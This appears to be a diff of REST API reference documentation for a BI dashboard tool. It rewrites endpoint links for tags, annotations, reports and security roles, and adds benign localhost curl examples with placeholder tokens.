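The saved-query export endpoint streams an archive of YAML definitions for the ids you pass as a Rison list. A sketch with placeholder ids:

```bash
# Export saved queries 1 and 2 as a bundle and write it to disk.
curl -G "http://localhost:8088/api/v1/saved_query/export/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  --data-urlencode "q=!(1,2)" \
  -o saved_queries.zip
```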
@@ -240,7 +240,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get possible values for a datasource column](./api/get-possible-values-for-a-datasource-column) | `/api/v1/datasource/{datasource_type}/{datasource_id}/column/{column_name}/values/` |
| `GET` | [Get possible values for a datasource column](/developer-docs/api/get-possible-values-for-a-datasource-column) | `/api/v1/datasource/{datasource_type}/{datasource_id}/column/{column_name}/values/` |

</details>
@@ -249,8 +249,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Return an AdvancedDataTypeResponse](./api/return-an-advanceddatatyperesponse) | `/api/v1/advanced_data_type/convert` |
| `GET` | [Return a list of available advanced data types](./api/return-a-list-of-available-advanced-data-types) | `/api/v1/advanced_data_type/types` |
| `GET` | [Return an AdvancedDataTypeResponse](/developer-docs/api/return-an-advanceddatatyperesponse) | `/api/v1/advanced_data_type/convert` |
| `GET` | [Return a list of available advanced data types](/developer-docs/api/return-a-list-of-available-advanced-data-types) | `/api/v1/advanced_data_type/types` |

</details>
@@ -261,21 +261,21 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Bulk delete tags](./api/bulk-delete-tags) | `/api/v1/tag/` |
| `GET` | [Get a list of tags](./api/get-a-list-of-tags) | `/api/v1/tag/` |
| `POST` | [Create a tag](./api/create-a-tag) | `/api/v1/tag/` |
| `GET` | [Get metadata information about tag API endpoints](./api/get-metadata-information-about-tag-api-endpoints) | `/api/v1/tag/_info` |
| `POST` | [Add tags to an object](./api/add-tags-to-an-object) | `/api/v1/tag/{object_type}/{object_id}/` |
| `DELETE` | [Delete a tagged object](./api/delete-a-tagged-object) | `/api/v1/tag/{object_type}/{object_id}/{tag}/` |
| `DELETE` | [Delete a tag](./api/delete-a-tag) | `/api/v1/tag/{pk}` |
| `GET` | [Get a tag detail information](./api/get-a-tag-detail-information) | `/api/v1/tag/{pk}` |
| `PUT` | [Update a tag](./api/update-a-tag) | `/api/v1/tag/{pk}` |
| `DELETE` | [Delete tag by pk favorites](./api/delete-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
| `POST` | [Create tag by pk favorites](./api/create-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
| `POST` | [Bulk create tags and tagged objects](./api/bulk-create-tags-and-tagged-objects) | `/api/v1/tag/bulk_create` |
| `GET` | [Get tag favorite status](./api/get-tag-favorite-status) | `/api/v1/tag/favorite_status/` |
| `GET` | [Get all objects associated with a tag](./api/get-all-objects-associated-with-a-tag) | `/api/v1/tag/get_objects/` |
| `GET` | [Get related fields data (tag-related-column-name)](./api/get-related-fields-data-tag-related-column-name) | `/api/v1/tag/related/{column_name}` |
| `DELETE` | [Bulk delete tags](/developer-docs/api/bulk-delete-tags) | `/api/v1/tag/` |
| `GET` | [Get a list of tags](/developer-docs/api/get-a-list-of-tags) | `/api/v1/tag/` |
| `POST` | [Create a tag](/developer-docs/api/create-a-tag) | `/api/v1/tag/` |
| `GET` | [Get metadata information about tag API endpoints](/developer-docs/api/get-metadata-information-about-tag-api-endpoints) | `/api/v1/tag/_info` |
| `POST` | [Add tags to an object](/developer-docs/api/add-tags-to-an-object) | `/api/v1/tag/{object_type}/{object_id}/` |
| `DELETE` | [Delete a tagged object](/developer-docs/api/delete-a-tagged-object) | `/api/v1/tag/{object_type}/{object_id}/{tag}/` |
| `DELETE` | [Delete a tag](/developer-docs/api/delete-a-tag) | `/api/v1/tag/{pk}` |
| `GET` | [Get a tag detail information](/developer-docs/api/get-a-tag-detail-information) | `/api/v1/tag/{pk}` |
| `PUT` | [Update a tag](/developer-docs/api/update-a-tag) | `/api/v1/tag/{pk}` |
| `DELETE` | [Delete tag by pk favorites](/developer-docs/api/delete-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
| `POST` | [Create tag by pk favorites](/developer-docs/api/create-tag-by-pk-favorites) | `/api/v1/tag/{pk}/favorites/` |
| `POST` | [Bulk create tags and tagged objects](/developer-docs/api/bulk-create-tags-and-tagged-objects) | `/api/v1/tag/bulk_create` |
| `GET` | [Get tag favorite status](/developer-docs/api/get-tag-favorite-status) | `/api/v1/tag/favorite_status/` |
| `GET` | [Get all objects associated with a tag](/developer-docs/api/get-all-objects-associated-with-a-tag) | `/api/v1/tag/get_objects/` |
| `GET` | [Get related fields data (tag-related-column-name)](/developer-docs/api/get-related-fields-data-tag-related-column-name) | `/api/v1/tag/related/{column_name}` |

</details>
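
Tags can be created standalone and later attached to dashboards, charts, or queries. A hedged sketch of the create call; the body fields are assumed and the name is a placeholder, so verify against the linked create-a-tag page:

```bash
# Create a tag that can later be attached to objects.
# The request body shape is an assumption; name and description are placeholders.
curl -X POST "http://localhost:8088/api/v1/tag/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "finance", "description": "Finance team assets"}'
```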
@@ -284,20 +284,20 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Delete multiple annotation layers in a bulk operation](./api/delete-multiple-annotation-layers-in-a-bulk-operation) | `/api/v1/annotation_layer/` |
| `GET` | [Get a list of annotation layers (annotation-layer)](./api/get-a-list-of-annotation-layers-annotation-layer) | `/api/v1/annotation_layer/` |
| `POST` | [Create an annotation layer (annotation-layer)](./api/create-an-annotation-layer-annotation-layer) | `/api/v1/annotation_layer/` |
| `GET` | [Get metadata information about this API resource (annotation-layer--info)](./api/get-metadata-information-about-this-api-resource-annotation-layer-info) | `/api/v1/annotation_layer/_info` |
| `DELETE` | [Delete annotation layer (annotation-layer-pk)](./api/delete-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `GET` | [Get an annotation layer (annotation-layer-pk)](./api/get-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `PUT` | [Update an annotation layer (annotation-layer-pk)](./api/update-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `DELETE` | [Bulk delete annotation layers](./api/bulk-delete-annotation-layers) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `GET` | [Get a list of annotation layers (annotation-layer-pk-annotation)](./api/get-a-list-of-annotation-layers-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `POST` | [Create an annotation layer (annotation-layer-pk-annotation)](./api/create-an-annotation-layer-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `DELETE` | [Delete annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/delete-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `GET` | [Get an annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/get-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `PUT` | [Update an annotation layer (annotation-layer-pk-annotation-annotation-id)](./api/update-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `GET` | [Get related fields data (annotation-layer-related-column-name)](./api/get-related-fields-data-annotation-layer-related-column-name) | `/api/v1/annotation_layer/related/{column_name}` |
| `DELETE` | [Delete multiple annotation layers in a bulk operation](/developer-docs/api/delete-multiple-annotation-layers-in-a-bulk-operation) | `/api/v1/annotation_layer/` |
| `GET` | [Get a list of annotation layers (annotation-layer)](/developer-docs/api/get-a-list-of-annotation-layers-annotation-layer) | `/api/v1/annotation_layer/` |
| `POST` | [Create an annotation layer (annotation-layer)](/developer-docs/api/create-an-annotation-layer-annotation-layer) | `/api/v1/annotation_layer/` |
| `GET` | [Get metadata information about this API resource (annotation-layer--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-annotation-layer-info) | `/api/v1/annotation_layer/_info` |
| `DELETE` | [Delete annotation layer (annotation-layer-pk)](/developer-docs/api/delete-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `GET` | [Get an annotation layer (annotation-layer-pk)](/developer-docs/api/get-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `PUT` | [Update an annotation layer (annotation-layer-pk)](/developer-docs/api/update-an-annotation-layer-annotation-layer-pk) | `/api/v1/annotation_layer/{pk}` |
| `DELETE` | [Bulk delete annotation layers](/developer-docs/api/bulk-delete-annotation-layers) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `GET` | [Get a list of annotation layers (annotation-layer-pk-annotation)](/developer-docs/api/get-a-list-of-annotation-layers-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `POST` | [Create an annotation layer (annotation-layer-pk-annotation)](/developer-docs/api/create-an-annotation-layer-annotation-layer-pk-annotation) | `/api/v1/annotation_layer/{pk}/annotation/` |
| `DELETE` | [Delete annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/delete-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `GET` | [Get an annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/get-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `PUT` | [Update an annotation layer (annotation-layer-pk-annotation-annotation-id)](/developer-docs/api/update-an-annotation-layer-annotation-layer-pk-annotation-annotation-id) | `/api/v1/annotation_layer/{pk}/annotation/{annotation_id}` |
| `GET` | [Get related fields data (annotation-layer-related-column-name)](/developer-docs/api/get-related-fields-data-annotation-layer-related-column-name) | `/api/v1/annotation_layer/related/{column_name}` |

</details>
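
Annotations are nested under layers, so creating one is a two-step flow: create the layer, then POST annotations against its id. A sketch with placeholder names, ids, and dates; the field names are assumptions based on the annotation schema:

```bash
# Step 1: create the layer (field names assumed; values are placeholders).
curl -X POST "http://localhost:8088/api/v1/annotation_layer/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "Releases", "descr": "Product release markers"}'

# Step 2: attach an annotation, assuming the layer above came back with id 7.
curl -X POST "http://localhost:8088/api/v1/annotation_layer/7/annotation/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"short_descr": "v2.0 launch", "start_dttm": "2024-01-15T00:00:00", "end_dttm": "2024-01-15T23:59:59"}'
```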
@@ -306,14 +306,14 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Bulk delete CSS templates](./api/bulk-delete-css-templates) | `/api/v1/css_template/` |
| `GET` | [Get a list of CSS templates](./api/get-a-list-of-css-templates) | `/api/v1/css_template/` |
| `POST` | [Create a CSS template](./api/create-a-css-template) | `/api/v1/css_template/` |
| `GET` | [Get metadata information about this API resource (css-template--info)](./api/get-metadata-information-about-this-api-resource-css-template-info) | `/api/v1/css_template/_info` |
| `DELETE` | [Delete a CSS template](./api/delete-a-css-template) | `/api/v1/css_template/{pk}` |
| `GET` | [Get a CSS template](./api/get-a-css-template) | `/api/v1/css_template/{pk}` |
| `PUT` | [Update a CSS template](./api/update-a-css-template) | `/api/v1/css_template/{pk}` |
| `GET` | [Get related fields data (css-template-related-column-name)](./api/get-related-fields-data-css-template-related-column-name) | `/api/v1/css_template/related/{column_name}` |
| `DELETE` | [Bulk delete CSS templates](/developer-docs/api/bulk-delete-css-templates) | `/api/v1/css_template/` |
| `GET` | [Get a list of CSS templates](/developer-docs/api/get-a-list-of-css-templates) | `/api/v1/css_template/` |
| `POST` | [Create a CSS template](/developer-docs/api/create-a-css-template) | `/api/v1/css_template/` |
| `GET` | [Get metadata information about this API resource (css-template--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-css-template-info) | `/api/v1/css_template/_info` |
| `DELETE` | [Delete a CSS template](/developer-docs/api/delete-a-css-template) | `/api/v1/css_template/{pk}` |
| `GET` | [Get a CSS template](/developer-docs/api/get-a-css-template) | `/api/v1/css_template/{pk}` |
| `PUT` | [Update a CSS template](/developer-docs/api/update-a-css-template) | `/api/v1/css_template/{pk}` |
| `GET` | [Get related fields data (css-template-related-column-name)](/developer-docs/api/get-related-fields-data-css-template-related-column-name) | `/api/v1/css_template/related/{column_name}` |

</details>
@@ -324,8 +324,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `POST` | [Create a new dashboard's permanent link](./api/create-a-new-dashboard-s-permanent-link) | `/api/v1/dashboard/{pk}/permalink` |
| `GET` | [Get dashboard's permanent link state](./api/get-dashboard-s-permanent-link-state) | `/api/v1/dashboard/permalink/{key}` |
| `POST` | [Create a new dashboard's permanent link](/developer-docs/api/create-a-new-dashboard-s-permanent-link) | `/api/v1/dashboard/{pk}/permalink` |
| `GET` | [Get dashboard's permanent link state](/developer-docs/api/get-dashboard-s-permanent-link-state) | `/api/v1/dashboard/permalink/{key}` |

</details>
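
Resolving a permalink is a plain GET on the key returned when the link was created. A sketch; the key below is a placeholder:

```bash
# Exchange a permalink key for the stored dashboard state.
curl "http://localhost:8088/api/v1/dashboard/permalink/AbCdEf123" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN"
```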
@@ -334,8 +334,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `POST` | [Create a new permanent link (explore-permalink)](./api/create-a-new-permanent-link-explore-permalink) | `/api/v1/explore/permalink` |
| `GET` | [Get chart's permanent link state](./api/get-chart-s-permanent-link-state) | `/api/v1/explore/permalink/{key}` |
| `POST` | [Create a new permanent link (explore-permalink)](/developer-docs/api/create-a-new-permanent-link-explore-permalink) | `/api/v1/explore/permalink` |
| `GET` | [Get chart's permanent link state](/developer-docs/api/get-chart-s-permanent-link-state) | `/api/v1/explore/permalink/{key}` |

</details>
@@ -344,8 +344,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `POST` | [Create a new permanent link (sqllab-permalink)](./api/create-a-new-permanent-link-sqllab-permalink) | `/api/v1/sqllab/permalink` |
| `GET` | [Get permanent link state for SQLLab editor.](./api/get-permanent-link-state-for-sqllab-editor) | `/api/v1/sqllab/permalink/{key}` |
| `POST` | [Create a new permanent link (sqllab-permalink)](/developer-docs/api/create-a-new-permanent-link-sqllab-permalink) | `/api/v1/sqllab/permalink` |
| `GET` | [Get permanent link state for SQLLab editor.](/developer-docs/api/get-permanent-link-state-for-sqllab-editor) | `/api/v1/sqllab/permalink/{key}` |

</details>
@@ -354,7 +354,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get a report schedule log (embedded-dashboard-uuid)](./api/get-a-report-schedule-log-embedded-dashboard-uuid) | `/api/v1/embedded_dashboard/{uuid}` |
| `GET` | [Get a report schedule log (embedded-dashboard-uuid)](/developer-docs/api/get-a-report-schedule-log-embedded-dashboard-uuid) | `/api/v1/embedded_dashboard/{uuid}` |

</details>
@@ -363,10 +363,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `POST` | [Create a dashboard's filter state](./api/create-a-dashboard-s-filter-state) | `/api/v1/dashboard/{pk}/filter_state` |
| `DELETE` | [Delete a dashboard's filter state value](./api/delete-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
| `GET` | [Get a dashboard's filter state value](./api/get-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
| `PUT` | [Update a dashboard's filter state value](./api/update-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
| `POST` | [Create a dashboard's filter state](/developer-docs/api/create-a-dashboard-s-filter-state) | `/api/v1/dashboard/{pk}/filter_state` |
| `DELETE` | [Delete a dashboard's filter state value](/developer-docs/api/delete-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
| `GET` | [Get a dashboard's filter state value](/developer-docs/api/get-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |
| `PUT` | [Update a dashboard's filter state value](/developer-docs/api/update-a-dashboard-s-filter-state-value) | `/api/v1/dashboard/{pk}/filter_state/{key}` |

</details>
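
Filter state is a small key-value store scoped to a dashboard; the stored value is an application-defined JSON string. A hedged sketch of updating an existing entry, where the dashboard id, key, and value are all placeholders:

```bash
# Overwrite the filter-state entry stored under an existing key.
# The {"value": "..."} body shape is an assumption; verify against the linked page.
curl -X PUT "http://localhost:8088/api/v1/dashboard/10/filter_state/AbCdEf123" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"value": "{\"native_filters\": {}}"}'
```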
@@ -375,10 +375,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `POST` | [Create a new form_data](./api/create-a-new-form-data) | `/api/v1/explore/form_data` |
| `DELETE` | [Delete a form_data](./api/delete-a-form-data) | `/api/v1/explore/form_data/{key}` |
| `GET` | [Get a form_data](./api/get-a-form-data) | `/api/v1/explore/form_data/{key}` |
| `PUT` | [Update an existing form_data](./api/update-an-existing-form-data) | `/api/v1/explore/form_data/{key}` |
| `POST` | [Create a new form_data](/developer-docs/api/create-a-new-form-data) | `/api/v1/explore/form_data` |
| `DELETE` | [Delete a form_data](/developer-docs/api/delete-a-form-data) | `/api/v1/explore/form_data/{key}` |
| `GET` | [Get a form_data](/developer-docs/api/get-a-form-data) | `/api/v1/explore/form_data/{key}` |
| `PUT` | [Update an existing form_data](/developer-docs/api/update-an-existing-form-data) | `/api/v1/explore/form_data/{key}` |

</details>
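
The form_data endpoints persist Explore state server-side and hand back a short key. A sketch with a placeholder datasource; note that `form_data` is passed as a JSON string, not a nested object:

```bash
# Store explore state and receive a key for later retrieval.
curl -X POST "http://localhost:8088/api/v1/explore/form_data" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"datasource_id": 1, "datasource_type": "table", "form_data": "{\"viz_type\": \"table\"}"}'
```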
@@ -389,17 +389,17 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `DELETE` | [Bulk delete report schedules](./api/bulk-delete-report-schedules) | `/api/v1/report/` |
| `GET` | [Get a list of report schedules](./api/get-a-list-of-report-schedules) | `/api/v1/report/` |
| `POST` | [Create a report schedule](./api/create-a-report-schedule) | `/api/v1/report/` |
| `GET` | [Get metadata information about this API resource (report--info)](./api/get-metadata-information-about-this-api-resource-report-info) | `/api/v1/report/_info` |
| `DELETE` | [Delete a report schedule](./api/delete-a-report-schedule) | `/api/v1/report/{pk}` |
| `GET` | [Get a report schedule](./api/get-a-report-schedule) | `/api/v1/report/{pk}` |
| `PUT` | [Update a report schedule](./api/update-a-report-schedule) | `/api/v1/report/{pk}` |
| `GET` | [Get a list of report schedule logs](./api/get-a-list-of-report-schedule-logs) | `/api/v1/report/{pk}/log/` |
| `GET` | [Get a report schedule log (report-pk-log-log-id)](./api/get-a-report-schedule-log-report-pk-log-log-id) | `/api/v1/report/{pk}/log/{log_id}` |
| `GET` | [Get related fields data (report-related-column-name)](./api/get-related-fields-data-report-related-column-name) | `/api/v1/report/related/{column_name}` |
| `GET` | [Get slack channels](./api/get-slack-channels) | `/api/v1/report/slack_channels/` |
| `DELETE` | [Bulk delete report schedules](/developer-docs/api/bulk-delete-report-schedules) | `/api/v1/report/` |
| `GET` | [Get a list of report schedules](/developer-docs/api/get-a-list-of-report-schedules) | `/api/v1/report/` |
| `POST` | [Create a report schedule](/developer-docs/api/create-a-report-schedule) | `/api/v1/report/` |
| `GET` | [Get metadata information about this API resource (report--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-report-info) | `/api/v1/report/_info` |
| `DELETE` | [Delete a report schedule](/developer-docs/api/delete-a-report-schedule) | `/api/v1/report/{pk}` |
| `GET` | [Get a report schedule](/developer-docs/api/get-a-report-schedule) | `/api/v1/report/{pk}` |
| `PUT` | [Update a report schedule](/developer-docs/api/update-a-report-schedule) | `/api/v1/report/{pk}` |
| `GET` | [Get a list of report schedule logs](/developer-docs/api/get-a-list-of-report-schedule-logs) | `/api/v1/report/{pk}/log/` |
| `GET` | [Get a report schedule log (report-pk-log-log-id)](/developer-docs/api/get-a-report-schedule-log-report-pk-log-log-id) | `/api/v1/report/{pk}/log/{log_id}` |
| `GET` | [Get related fields data (report-related-column-name)](/developer-docs/api/get-related-fields-data-report-related-column-name) | `/api/v1/report/related/{column_name}` |
| `GET` | [Get slack channels](/developer-docs/api/get-slack-channels) | `/api/v1/report/slack_channels/` |

</details>
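
Each report schedule keeps an execution log that can be paged through like any other list endpoint. A sketch with a placeholder schedule id and paging values:

```bash
# Page through the execution log of report schedule 3.
curl -G "http://localhost:8088/api/v1/report/3/log/" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  --data-urlencode "q=(page:0,page_size:20)"
```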
@@ -410,16 +410,16 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get security roles](./api/get-security-roles) | `/api/v1/security/roles/` |
| `POST` | [Create security roles](./api/create-security-roles) | `/api/v1/security/roles/` |
| `GET` | [Get security roles info](./api/get-security-roles-info) | `/api/v1/security/roles/_info` |
| `DELETE` | [Delete security roles by pk](./api/delete-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `GET` | [Get security roles by pk](./api/get-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `PUT` | [Update security roles by pk](./api/update-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `POST` | [Create security roles by role_id permissions](./api/create-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions` |
| `GET` | [Get security roles by role_id permissions](./api/get-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions/` |
| `PUT` | [Update security roles by role_id users](./api/update-security-roles-by-role-id-users) | `/api/v1/security/roles/{role_id}/users` |
| `GET` | [List roles](./api/list-roles) | `/api/v1/security/roles/search/` |
| `GET` | [Get security roles](/developer-docs/api/get-security-roles) | `/api/v1/security/roles/` |
| `POST` | [Create security roles](/developer-docs/api/create-security-roles) | `/api/v1/security/roles/` |
| `GET` | [Get security roles info](/developer-docs/api/get-security-roles-info) | `/api/v1/security/roles/_info` |
| `DELETE` | [Delete security roles by pk](/developer-docs/api/delete-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `GET` | [Get security roles by pk](/developer-docs/api/get-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `PUT` | [Update security roles by pk](/developer-docs/api/update-security-roles-by-pk) | `/api/v1/security/roles/{pk}` |
| `POST` | [Create security roles by role_id permissions](/developer-docs/api/create-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions` |
| `GET` | [Get security roles by role_id permissions](/developer-docs/api/get-security-roles-by-role-id-permissions) | `/api/v1/security/roles/{role_id}/permissions/` |
| `PUT` | [Update security roles by role_id users](/developer-docs/api/update-security-roles-by-role-id-users) | `/api/v1/security/roles/{role_id}/users` |
| `GET` | [List roles](/developer-docs/api/list-roles) | `/api/v1/security/roles/search/` |

</details>
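
Role permissions are assigned in bulk by id. A hedged sketch, assuming the body carries `permission_view_menu_ids` with ids taken from the permissions-resources endpoints below; the role id and ids are placeholders:

```bash
# Grant two permission/view pairs to role 5.
# The body field name is an assumption; verify against the linked page.
curl -X POST "http://localhost:8088/api/v1/security/roles/5/permissions" \
  -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"permission_view_menu_ids": [101, 102]}'
```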
@@ -428,12 +428,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get security users](./api/get-security-users) | `/api/v1/security/users/` |
| `POST` | [Create security users](./api/create-security-users) | `/api/v1/security/users/` |
| `GET` | [Get security users info](./api/get-security-users-info) | `/api/v1/security/users/_info` |
| `DELETE` | [Delete security users by pk](./api/delete-security-users-by-pk) | `/api/v1/security/users/{pk}` |
| `GET` | [Get security users by pk](./api/get-security-users-by-pk) | `/api/v1/security/users/{pk}` |
| `PUT` | [Update security users by pk](./api/update-security-users-by-pk) | `/api/v1/security/users/{pk}` |
| `GET` | [Get security users](/developer-docs/api/get-security-users) | `/api/v1/security/users/` |
| `POST` | [Create security users](/developer-docs/api/create-security-users) | `/api/v1/security/users/` |
| `GET` | [Get security users info](/developer-docs/api/get-security-users-info) | `/api/v1/security/users/_info` |
| `DELETE` | [Delete security users by pk](/developer-docs/api/delete-security-users-by-pk) | `/api/v1/security/users/{pk}` |
| `GET` | [Get security users by pk](/developer-docs/api/get-security-users-by-pk) | `/api/v1/security/users/{pk}` |
| `PUT` | [Update security users by pk](/developer-docs/api/update-security-users-by-pk) | `/api/v1/security/users/{pk}` |

</details>
@@ -442,9 +442,9 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get security permissions](./api/get-security-permissions) | `/api/v1/security/permissions/` |
| `GET` | [Get security permissions info](./api/get-security-permissions-info) | `/api/v1/security/permissions/_info` |
| `GET` | [Get security permissions by pk](./api/get-security-permissions-by-pk) | `/api/v1/security/permissions/{pk}` |
| `GET` | [Get security permissions](/developer-docs/api/get-security-permissions) | `/api/v1/security/permissions/` |
| `GET` | [Get security permissions info](/developer-docs/api/get-security-permissions-info) | `/api/v1/security/permissions/_info` |
| `GET` | [Get security permissions by pk](/developer-docs/api/get-security-permissions-by-pk) | `/api/v1/security/permissions/{pk}` |

</details>
@@ -453,12 +453,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \

| Method | Description | Endpoint |
|--------|-------------|----------|
| `GET` | [Get security resources](./api/get-security-resources) | `/api/v1/security/resources/` |
| `POST` | [Create security resources](./api/create-security-resources) | `/api/v1/security/resources/` |
| `GET` | [Get security resources info](./api/get-security-resources-info) | `/api/v1/security/resources/_info` |
| `DELETE` | [Delete security resources by pk](./api/delete-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
| `GET` | [Get security resources by pk](./api/get-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
| `PUT` | [Update security resources by pk](./api/update-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
| `GET` | [Get security resources](/developer-docs/api/get-security-resources) | `/api/v1/security/resources/` |
| `POST` | [Create security resources](/developer-docs/api/create-security-resources) | `/api/v1/security/resources/` |
| `GET` | [Get security resources info](/developer-docs/api/get-security-resources-info) | `/api/v1/security/resources/_info` |
| `DELETE` | [Delete security resources by pk](/developer-docs/api/delete-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
| `GET` | [Get security resources by pk](/developer-docs/api/get-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |
| `PUT` | [Update security resources by pk](/developer-docs/api/update-security-resources-by-pk) | `/api/v1/security/resources/{pk}` |

</details>
|
||||
|
||||
@@ -467,12 +467,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get security permissions resources](./api/get-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `POST` | [Create security permissions resources](./api/create-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `GET` | [Get security permissions resources info](./api/get-security-permissions-resources-info) | `/api/v1/security/permissions-resources/_info` |
|
||||
| `DELETE` | [Delete security permissions resources by pk](./api/delete-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `GET` | [Get security permissions resources by pk](./api/get-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `PUT` | [Update security permissions resources by pk](./api/update-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `GET` | [Get security permissions resources](/developer-docs/api/get-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `POST` | [Create security permissions resources](/developer-docs/api/create-security-permissions-resources) | `/api/v1/security/permissions-resources/` |
|
||||
| `GET` | [Get security permissions resources info](/developer-docs/api/get-security-permissions-resources-info) | `/api/v1/security/permissions-resources/_info` |
|
||||
| `DELETE` | [Delete security permissions resources by pk](/developer-docs/api/delete-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `GET` | [Get security permissions resources by pk](/developer-docs/api/get-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
